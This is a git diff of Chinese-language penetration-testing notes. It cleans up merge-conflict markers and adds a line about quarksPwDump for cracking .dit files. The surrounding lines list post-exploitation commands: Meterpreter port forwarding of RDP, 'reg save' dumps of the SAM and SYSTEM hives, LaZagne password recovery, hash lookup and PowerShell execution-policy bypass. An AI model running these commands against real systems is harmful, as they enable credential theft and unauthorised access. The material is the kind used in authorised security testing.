--- a/安全/渗透.md
+++ b/安全/渗透.md
@@ -350,10 +350,7 @@ Vegil
 
 portfwd 映射端口
  192.168.1.53 源  目标需要被映射的地址 192.168.1.119 
-
-<<<<<<< HEAD
  portfwd   add  -L  192.168.1.53  ‐ l   33389   ‐ r   192.168.1.119   ‐ p 3389
-=======
  portfwd   add  -L  192.168.1.53  ‐ l   33389   ‐ r   192.168.1.119   ‐ p 3389
  #### frp 搭建内网穿透访问外网代理
 
@@ -395,8 +392,6 @@ reg save HKLM\sam sam
 reg save HKLM\system system
 
 #### LaZagane 获取windows 系统的密码
-
-<<<<<<< HEAD
 cmd5.com  查看hash值
 
 #### 显示 rdp 连接用户
@@ -404,3 +399,5 @@ cmd5.com  查看hash值
 powershell -exec  bypass -f ListAllUser.psl 
 
 ### 
+
+quarksPwDump 破解 dit 文件
